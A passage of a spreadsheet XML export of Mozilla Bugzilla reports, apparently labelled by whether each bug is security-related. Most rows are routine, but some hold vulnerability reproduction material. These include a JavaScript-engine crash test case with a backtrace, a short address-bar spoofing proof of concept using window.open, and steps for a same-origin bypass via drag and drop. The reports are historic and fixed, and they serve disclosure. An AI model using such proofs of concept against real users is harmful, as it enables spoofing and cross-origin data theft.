      <c r="O2342" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2342" t="inlineStr"/>
      <c r="Q2342" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2342" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2342" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2342" t="n">
        <v>1</v>
      </c>
      <c r="U2342" t="n">
        <v>0</v>
      </c>
      <c r="V2342" t="n">
        <v>9</v>
      </c>
      <c r="W2342" t="inlineStr">
        <is>
          <t>We need a News update for the release of Bugzilla 2.20.2, 2.22, and 2.23.1. An email announcement will also need to be sent out. The email announcement will have the same text as the News announcement.
If you want to help out take a look at what was done for the previous Release/News announcement:
News/Release Announcement for 2.16.11, 2.18.5, 2.20.1, and 2.22rc1 - bug 320310</t>
        </is>
      </c>
      <c r="X2342" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2343">
      <c r="A2343" t="n">
        <v>1436507</v>
      </c>
      <c r="B2343" t="inlineStr">
        <is>
          <t>2018-02-07 12:31:14 -0800</t>
        </is>
      </c>
      <c r="C2343" t="inlineStr">
        <is>
          <t>Lacking documentation link in contribute.json</t>
        </is>
      </c>
      <c r="D2343" t="inlineStr">
        <is>
          <t>2018-02-07 12:48:45 -0800</t>
        </is>
      </c>
      <c r="E2343" t="n">
        <v>1</v>
      </c>
      <c r="F2343" t="n">
        <v>1</v>
      </c>
      <c r="G2343" t="n">
        <v>4</v>
      </c>
      <c r="H2343" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2343" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2343" t="inlineStr">
        <is>
          <t>Symbols</t>
        </is>
      </c>
      <c r="K2343" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2343" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2343" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2343" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2343" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2343" t="inlineStr"/>
      <c r="Q2343" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2343" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2343" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2343" t="n">
        <v>1</v>
      </c>
      <c r="U2343" t="n">
        <v>0</v>
      </c>
      <c r="V2343" t="n">
        <v>3</v>
      </c>
      <c r="W2343" t="inlineStr">
        <is>
          <t>Created attachment 8949154
Screen Shot 2018-02-07 at 3.30.44 PM.png
See attached screenshot.</t>
        </is>
      </c>
      <c r="X2343" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2344">
      <c r="A2344" t="n">
        <v>713209</v>
      </c>
      <c r="B2344" t="inlineStr">
        <is>
          <t>2011-12-23 04:58:12 -0800</t>
        </is>
      </c>
      <c r="C2344" t="inlineStr">
        <is>
          <t>Crash [@ __memcpy_ssse3_rep] through JSRope::flatten</t>
        </is>
      </c>
      <c r="D2344" t="inlineStr">
        <is>
          <t>2013-01-19 13:58:09 -0800</t>
        </is>
      </c>
      <c r="E2344" t="n">
        <v>1</v>
      </c>
      <c r="F2344" t="n">
        <v>1</v>
      </c>
      <c r="G2344" t="n">
        <v>3</v>
      </c>
      <c r="H2344" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2344" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2344" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2344" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2344" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2344" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2344" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2344" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2344" t="inlineStr">
        <is>
          <t>[sg:critical][qa+:ashughes] js-triage-needed</t>
        </is>
      </c>
      <c r="Q2344" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2344" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2344" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T2344" t="n">
        <v>1</v>
      </c>
      <c r="U2344" t="n">
        <v>0</v>
      </c>
      <c r="V2344" t="n">
        <v>19</v>
      </c>
      <c r="W2344" t="inlineStr">
        <is>
          <t>The following test crashes on mozilla-central revision c5b90ea7e475 (options -m -n -a, 32 bit only):
var save__proto__ = __proto__;
__proto__ = save__proto__;
function bar(x, y) {
  return x + y;
}
function foo(x, y) {
  var a = 0;
  for (var i = 0; i &lt; 1000; i++) {
    a += (this.toString);
    a += bar(x, y);
    a = bar(x, (a));
    a += bar(x, y);
  }
  return a;
}
var q = foo(0, 1);
print(q.toSource());
Backtrace:
#0  __memcpy_ssse3_rep () at ../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S:1293
#1  0x08243150 in js::PodCopy&lt;unsigned short&gt; (dst=0xd477d008, src=0xf7400160, nelem=259260942) at ../jsutil.h:322
#2  0x08243dd6 in JSRope::flattenInternal&lt;(JSRope::UsingBarrier)1&gt; (this=0xf741db00, maybecx=0x8545568) at /srv/repos/mozilla-central/js/src/vm/String.cpp:225
#3  0x08242431 in JSRope::flatten (this=0xf741db00, maybecx=0x8545568) at /srv/repos/mozilla-central/js/src/vm/String.cpp:268
#4  0x08086f4c in JSString::ensureLinear (this=0xf741db00, cx=0x8545568) at /srv/repos/mozilla-central/js/src/vm/String.h:822
#5  0x08086ebc in JSString::getChars (this=0xf741db00, cx=0x8545568) at /srv/repos/mozilla-central/js/src/vm/String.h:804
#6  0x0817ef10 in QuoteString (sp=0xffffc804, str=0xf741db00, quote=34) at /srv/repos/mozilla-central/js/src/jsopcode.cpp:872
#7  0x0817f269 in js_QuoteString (cx=0x8545568, str=0xf741db00, quote=34) at /srv/repos/mozilla-central/js/src/jsopcode.cpp:940
#8  0x081c8c52 in str_toSource (cx=0x8545568, argc=0, vp=0xf76ea068) at /srv/repos/mozilla-central/js/src/jsstr.cpp:536
#9  0x08140a8c in js::CallJSNative (cx=0x8545568, native=0x81c8ba4 &lt;str_toSource(JSContext*, uintN, JS::Value*)&gt;, args=...) at ../jscntxtinlines.h:311
#10 0x08123de2 in js::InvokeKernel (cx=0x8545568, args=..., construct=js::NO_CONSTRUCT) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:625
#11 0x08132ad0 in js::Interpret (cx=0x8545568, entryFrame=0xf76ea020, interpMode=js::JSINTERP_NORMAL) at /srv/repos/mozilla-central/js/src/jsinterp.cpp:3506
#12 0x0829e62c in js::mjit::EnterMethodJIT (cx=0x8545568, fp=0xf76ea020, code=0xf73ce050, stackLimit=0xf7aca000, partial=false)
    at /srv/repos/mozilla-central/js/src/methodjit/MethodJIT.cpp:1093
S-s and sg:critical due to obvious memory hazard (probably buffer overflow).</t>
        </is>
      </c>
      <c r="X2344" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2345">
      <c r="A2345" t="n">
        <v>433610</v>
      </c>
      <c r="B2345" t="inlineStr">
        <is>
          <t>2008-05-13 15:32:48 -0700</t>
        </is>
      </c>
      <c r="C2345" t="inlineStr">
        <is>
          <t>Mozilla Firefox Flash Player Dynamic Module Unloading Vulnerability (ZDI-CAN-259)</t>
        </is>
      </c>
      <c r="D2345" t="inlineStr">
        <is>
          <t>2022-05-16 12:51:10 -0700</t>
        </is>
      </c>
      <c r="E2345" t="n">
        <v>1</v>
      </c>
      <c r="F2345" t="n">
        <v>1</v>
      </c>
      <c r="G2345" t="n">
        <v>6</v>
      </c>
      <c r="H2345" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I2345" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J2345" t="inlineStr">
        <is>
          <t>Plug-ins</t>
        </is>
      </c>
      <c r="K2345" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L2345" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2345" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N2345" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2345" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2345" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q2345" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2345" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2345" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2345" t="n">
        <v>1</v>
      </c>
      <c r="U2345" t="n">
        <v>0</v>
      </c>
      <c r="V2345" t="n">
        <v>36</v>
      </c>
      <c r="W2345" t="inlineStr">
        <is>
          <t>Created attachment 320804
Vulnerability write-up
Tipping Point has reported a bug in the Flash plugin for Firefox which they claim contains a buffer overflow.  This could potentially allow an attacker to execute arbitrary code on victim's computer.  I have not been able to confirm or reproduce the bug yet, and it would be great if we can get confirmation from someone in the Security Group.
Attached is the vulnerability summary submitted by the Tipping Point researcher, Cameron Hotchkies.  I will also attach the proof-of-concept materials shortly.</t>
        </is>
      </c>
      <c r="X2345" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2346">
      <c r="A2346" t="n">
        <v>1322864</v>
      </c>
      <c r="B2346" t="inlineStr">
        <is>
          <t>2016-12-10 15:32:07 -0800</t>
        </is>
      </c>
      <c r="C2346" t="inlineStr">
        <is>
          <t>SOP bypass using drag and drop of image.</t>
        </is>
      </c>
      <c r="D2346" t="inlineStr">
        <is>
          <t>2024-05-30 09:24:11 -0700</t>
        </is>
      </c>
      <c r="E2346" t="n">
        <v>1</v>
      </c>
      <c r="F2346" t="n">
        <v>1</v>
      </c>
      <c r="G2346" t="n">
        <v>3</v>
      </c>
      <c r="H2346" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2346" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2346" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K2346" t="inlineStr">
        <is>
          <t>52 Branch</t>
        </is>
      </c>
      <c r="L2346" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2346" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2346" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2346" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2346" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main71+]</t>
        </is>
      </c>
      <c r="Q2346" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2346" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2346" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T2346" t="n">
        <v>1</v>
      </c>
      <c r="U2346" t="n">
        <v>0</v>
      </c>
      <c r="V2346" t="n">
        <v>50</v>
      </c>
      <c r="W2346" t="inlineStr">
        <is>
          <t>Created attachment 8817834
PoC-SOPB.html
User Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
Steps to reproduce:
When closing opened popups whilst dragging an image from that popups the dragged object contains a File object once dropped on cross origin document.
1. Open attached PoC
2. Press button to open window
3. Attempt to drag the box as instructed
4. After popup closes, drop the 'image' anywhere on the document
We end up with full contents of a cross origin website.
Actual results:
A file object is created for some reason with the contents of a cross origin image, despite the image being invalid.
Expected results:
Same as when we don't close the window, no File object should be created unless the image loads, even then we should block it if the image is cross origin.</t>
        </is>
      </c>
      <c r="X2346" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2347">
      <c r="A2347" t="n">
        <v>1128196</v>
      </c>
      <c r="B2347" t="inlineStr">
        <is>
          <t>2015-01-31 11:35:22 -0800</t>
        </is>
      </c>
      <c r="C2347" t="inlineStr">
        <is>
          <t>Skipping argument type checks is unsafe when the callee is relazified</t>
        </is>
      </c>
      <c r="D2347" t="inlineStr">
        <is>
          <t>2016-07-02 10:11:09 -0700</t>
        </is>
      </c>
      <c r="E2347" t="n">
        <v>1</v>
      </c>
      <c r="F2347" t="n">
        <v>1</v>
      </c>
      <c r="G2347" t="n">
        <v>3</v>
      </c>
      <c r="H2347" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2347" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2347" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K2347" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2347" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2347" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2347" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2347" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2347" t="inlineStr">
        <is>
          <t>[adv-main36+][adv-esr31.5+]</t>
        </is>
      </c>
      <c r="Q2347" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2347" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2347" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T2347" t="n">
        <v>1</v>
      </c>
      <c r="U2347" t="n">
        <v>0</v>
      </c>
      <c r="V2347" t="n">
        <v>20</v>
      </c>
      <c r="W2347" t="inlineStr">
        <is>
          <t>I did some Try pushes with more eager JIT compilation, and it triggered a bunch of mysterious argument-check failures on various test suites. I think what's happening is this:
(1) We have a callee function (ArrayIndexOf in the case I looked at), that has a TypeScript. Let's call this function G.
(2) We Ion-compile a function (F) that calls G. We use G's TypeScript to determine we can skip the argument type checks for this call.
(3) We relazify G.
(4) G is unlazified, gets a new JSScript with a new TypeScript, new Baseline/Ion code.
(5) F's Ion code is still the same and it can call G and skip the argument checks. However, this is no longer sound, because G has a new TypeScript and its argument types are no longer guaranteed to match...</t>
        </is>
      </c>
      <c r="X2347" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2348">
      <c r="A2348" t="n">
        <v>1352366</v>
      </c>
      <c r="B2348" t="inlineStr">
        <is>
          <t>2017-03-31 02:53:57 -0700</t>
        </is>
      </c>
      <c r="C2348" t="inlineStr">
        <is>
          <t>Implement new location and search bar appearance</t>
        </is>
      </c>
      <c r="D2348" t="inlineStr">
        <is>
          <t>2017-09-29 08:01:43 -0700</t>
        </is>
      </c>
      <c r="E2348" t="n">
        <v>1</v>
      </c>
      <c r="F2348" t="n">
        <v>1</v>
      </c>
      <c r="G2348" t="n">
        <v>2</v>
      </c>
      <c r="H2348" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2348" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2348" t="inlineStr">
        <is>
          <t>Theme</t>
        </is>
      </c>
      <c r="K2348" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2348" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2348" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2348" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2348" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2348" t="inlineStr">
        <is>
          <t>[photon-visual][p1][57]</t>
        </is>
      </c>
      <c r="Q2348" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2348" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2348" t="inlineStr">
        <is>
          <t>Firefox 55</t>
        </is>
      </c>
      <c r="T2348" t="n">
        <v>1</v>
      </c>
      <c r="U2348" t="n">
        <v>1</v>
      </c>
      <c r="V2348" t="n">
        <v>33</v>
      </c>
      <c r="W2348" t="inlineStr">
        <is>
          <t>Stephen to provide UX spec.</t>
        </is>
      </c>
      <c r="X2348" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2349">
      <c r="A2349" t="n">
        <v>254303</v>
      </c>
      <c r="B2349" t="inlineStr">
        <is>
          <t>2004-08-04 10:36:49 -0700</t>
        </is>
      </c>
      <c r="C2349" t="inlineStr">
        <is>
          <t>1.7.2 tar.gz package has wrong permissions</t>
        </is>
      </c>
      <c r="D2349" t="inlineStr">
        <is>
          <t>2006-03-12 17:50:24 -0800</t>
        </is>
      </c>
      <c r="E2349" t="n">
        <v>1</v>
      </c>
      <c r="F2349" t="n">
        <v>1</v>
      </c>
      <c r="G2349" t="n">
        <v>2</v>
      </c>
      <c r="H2349" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2349" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J2349" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K2349" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2349" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2349" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2349" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2349" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2349" t="inlineStr">
        <is>
          <t>[patch]fixed1.7.3</t>
        </is>
      </c>
      <c r="Q2349" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2349" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2349" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2349" t="n">
        <v>1</v>
      </c>
      <c r="U2349" t="n">
        <v>0</v>
      </c>
      <c r="V2349" t="n">
        <v>24</v>
      </c>
      <c r="W2349" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.2) Gecko/20040803 MultiZilla/1.6.4.0b
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.2) Gecko/20040803 MultiZilla/1.6.4.0b
Just installed the tar.gz package. The package unpacks as follows: 
nathan:/usr/local # l mozilla/
insgesamt 5080
drwxrwxrwx  12  500  500   4096 2004-08-04 19:16 ./
drwxr-xr-x  20 root root   4096 2004-08-04 19:19 ../
-rw-r--r--   1 root root      0 2004-08-04 19:16 .autoreg
-rw-rw-rw-   1  500  500  30869 1999-10-06 04:14 LICENSE
-rw-rw-rw-   1  500  500   9542 2004-03-13 07:25 README.txt
-rwxrwxrwx   1  500  500  20424 2004-08-03 22:07 TestGtkEmbed*
-rw-rw-rw-   1  500  500    208 2002-08-02 00:59 bloaturls.txt
drwxrwxr-x  22  500  500   4096 2004-08-04 19:16 chrome/
drwxrwxrwx   4  500  500   8192 2004-08-04 19:16 components/
drwxrwxrwx   8  500  500     87 2004-08-03 21:51 defaults/
-rwxrwxrwx   1  500  500   5460 2004-08-03 22:07 dirver*
-rwxrwxrwx   1  500  500  14552 2004-08-03 22:07 elf-dynstr-gc*
drwxrwxrwx   2  500  500     83 2004-08-03 18:59 greprefs/
etc. etc. i.e. most dirs and files are world writable and belong to a non-root
user. As a workaround, one can 
chmod -R go-w mozilla
chown -R root.root mozilla
Please correct this problem - it imposes a security risk for many non-savvy users. 
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X2349" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2350">
      <c r="A2350" t="n">
        <v>556957</v>
      </c>
      <c r="B2350" t="inlineStr">
        <is>
          <t>2010-04-02 21:11:14 -0700</t>
        </is>
      </c>
      <c r="C2350" t="inlineStr">
        <is>
          <t>Address bar spoofing possible via window.open() + HTTP 204 responses or window.stop()</t>
        </is>
      </c>
      <c r="D2350" t="inlineStr">
        <is>
          <t>2010-08-20 18:44:49 -0700</t>
        </is>
      </c>
      <c r="E2350" t="n">
        <v>1</v>
      </c>
      <c r="F2350" t="n">
        <v>1</v>
      </c>
      <c r="G2350" t="n">
        <v>2</v>
      </c>
      <c r="H2350" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2350" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2350" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K2350" t="inlineStr">
        <is>
          <t>3.6 Branch</t>
        </is>
      </c>
      <c r="L2350" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2350" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2350" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2350" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2350" t="inlineStr">
        <is>
          <t>[sg:moderate spoof]</t>
        </is>
      </c>
      <c r="Q2350" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2350" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2350" t="inlineStr">
        <is>
          <t>Firefox 3.7a5</t>
        </is>
      </c>
      <c r="T2350" t="n">
        <v>1</v>
      </c>
      <c r="U2350" t="n">
        <v>0</v>
      </c>
      <c r="V2350" t="n">
        <v>54</v>
      </c>
      <c r="W2350" t="inlineStr">
        <is>
          <t>Hi folks,
A considerable number of large sites on the Internet have at least one write-only location that responds with HTTP 204 ("No content") when queried directly.
Unfortunately, Firefox seems to handle 204 responses in a weird way, in some cases displaying the new URL in the URL bar, but keeping the old document in place. Specifically, consider this example:
-- snip! --
&lt;html&gt;
&lt;input type=submit value="Click me now" onclick="clicked()"&gt;
&lt;script&gt;
var w;
function clicked() {
  w = window.open("https://www.google.com/csi","_blank");
  setTimeout('w.document.body.innerHTML = "I am not https://www.google.com at all!"', 500);
}
&lt;/script&gt;
-- snip! --
This, obviously, looks pretty bad.</t>
        </is>
      </c>
      <c r="X2350" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2351">
      <c r="A2351" t="n">
        <v>877175</v>
      </c>
      <c r="B2351" t="inlineStr">
        <is>
          <t>2013-05-29 07:16:32 -0700</t>
        </is>
      </c>
      <c r="C2351" t="inlineStr">
        <is>
          <t>Investigate lack of plugin related data in elasticsearch</t>
        </is>
      </c>
      <c r="D2351" t="inlineStr">
        <is>
          <t>2013-06-05 15:09:13 -0700</t>
        </is>
      </c>
      <c r="E2351" t="n">
        <v>1</v>
      </c>
      <c r="F2351" t="n">
        <v>1</v>
      </c>
      <c r="G2351" t="n">
        <v>4</v>
      </c>
      <c r="H2351" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2351" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2351" t="inlineStr">
        <is>
          <t>Backend</t>
        </is>
      </c>
      <c r="K2351" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2351" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2351" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2351" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2351" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2351" t="inlineStr"/>
      <c r="Q2351" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2351" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2351" t="inlineStr">
        <is>
          <t>50</t>
        </is>
      </c>
      <c r="T2351" t="n">
        <v>1</v>
      </c>
      <c r="U2351" t="n">
        <v>0</v>
      </c>
      <c r="V2351" t="n">
        <v>3</v>
      </c>
      <c r="W2351" t="inlineStr">
        <is>
          <t>It seems all plugin fields are empty in elasticsearch. We need to investigate why it is, and fix it.</t>
        </is>
      </c>
      <c r="X2351" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2352">
      <c r="A2352" t="n">
        <v>285111</v>
      </c>
      <c r="B2352" t="inlineStr">
        <is>
          <t>2005-03-07 04:16:14 -0800</t>
        </is>
      </c>
      <c r="C2352" t="inlineStr">
        <is>
          <t>Installation checks will not be reliable in a cross-database environment</t>
        </is>
      </c>
      <c r="D2352" t="inlineStr">
        <is>
          <t>2005-06-14 23:43:03 -0700</t>
        </is>
      </c>
      <c r="E2352" t="n">
        <v>1</v>
      </c>
      <c r="F2352" t="n">
        <v>1</v>
      </c>
      <c r="G2352" t="n">
        <v>4</v>
      </c>
      <c r="H2352" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2352" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2352" t="inlineStr">
        <is>
          <t>Installation &amp; Upgrading</t>
        </is>
      </c>
      <c r="K2352" t="inlineStr">
        <is>
          <t>2.19.2</t>
        </is>
      </c>
      <c r="L2352" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2352" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2352" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2352" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2352" t="inlineStr"/>
      <c r="Q2352" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2352" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2352" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T2352" t="n">
        <v>1</v>
      </c>
      <c r="U2352" t="n">
        <v>1</v>
      </c>
      <c r="V2352" t="n">
        <v>17</v>
      </c>
      <c r="W2352" t="inlineStr">
        <is>
          <t>Basically, we want to store a serialized Schema in the database, and
read/change it to do our installation checks.
  Below is the original email I sent on this subject to developers@, which
describes both the problem and the proposed solution.
----------------------------------------------------------
  I've come across an interesting theoretical problem, today, when
thinking about our new cross-platform installation.
        Basically, here's the problem:
        We have a new Bugzilla::DB::Schema module coming, which is almost
complete. (See
&lt;https://bugzilla.mozilla.org/show_bug.cgi?id=bz-dbschema&gt;). It maps
"generic" types to database-specific types. It's very cool.
        We, the developers, cannot really know how any given database will map
a "generic" type to a database-specific type. There's just no way at
this point to predict that for every database that we might implement. 
        For example, for the PostgreSQL patch, all integers will probably be
the same size, namely, "integer."
        Now, guess how checksetup works? It checks to see if fields have
changed their definition! So let's say that we changed a field from a
"small integer" to a "large integer," and then we wanted to trigger a
change based on that. On MySQL, the triggered change code would run
fine. On PostgreSQL, the triggered change would never run, because a
"small integer" and a "large integer" are the SAME SIZE.
        Now, what if we had a database system where all variable-length text
fields had the same underlying implementation? That is, where varchar ==
tinytext == mediumtext, etc. We couldn't trigger a change on moving
something from varchar to text.
        Thankfully, this is not an urgent issue. We currently have no other
databases besides MySQL to upgrade. Even when we implement PostgreSQL
support, we will only have to truly upgrade starting with 2.22, although
our first 2.21 release may also have some requirements in that area.
        I think we have a few choices that I can think of that will be entirely
future-proof:
        (1) Store a version number somewhere in the database. When we upgrade,
read that version number and run the correct upgrade code.
        Problem: This makes running checksetup against a CVS tree very risky,
where before that was no problem.
        (2) Store the entire current schema itself in the database. That way
we'll always know what the "generic" type of a field is SUPPOSED to be,
even if it's not possible to read out that information.
        Problem: That's a somewhat-decent amount of work.
        Really, to keep our current functionality, I think that #2 is probably
the best solution at this point. With Bugzilla::DB::Schema, this is
somewhat easier. In fact, the easiest way would just be to store a
Data::Dumper-&gt;Dump of the generic {schema} hash inside of
Bugzilla::DB::Schema. However, that requires that the internal data
structures of Bugzilla::DB::Schema either:
        (1) Always stay the same.
        (2) Always provide backwards-compatibility.
        Storing the schema in the database will also make my life in
implementing cross-db installation a LOT easier. Right now, in order to
get the definition of a table column in a cross-database fashion, I have
to do a lot of hocus-pocus with DBI.
        Now, any advice on how we can best accomplish all of this in a fully
maintainable and future proof way is very welcome. :-) 
        I think the structures of Bugzilla::DB::Schema (the next version, not
quite this version) should be fine. We'll have to implement a
serialize() and deserialize() function, and when we serialize the data,
we MUST store along with it the version of the schema that's being
stored. I think that we should use a special DB::Schema version, as
opposed to the Bugzilla version itself, since we care about when the
Schema internal format changes, not when Bugzilla itself changes.
        -Max</t>
        </is>
      </c>
      <c r="X2352" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2353">
      <c r="A2353" t="n">
        <v>809295</v>
      </c>
      <c r="B2353" t="inlineStr">
        <is>
          <t>2012-11-06 17:30:03 -0800</t>
        </is>
      </c>
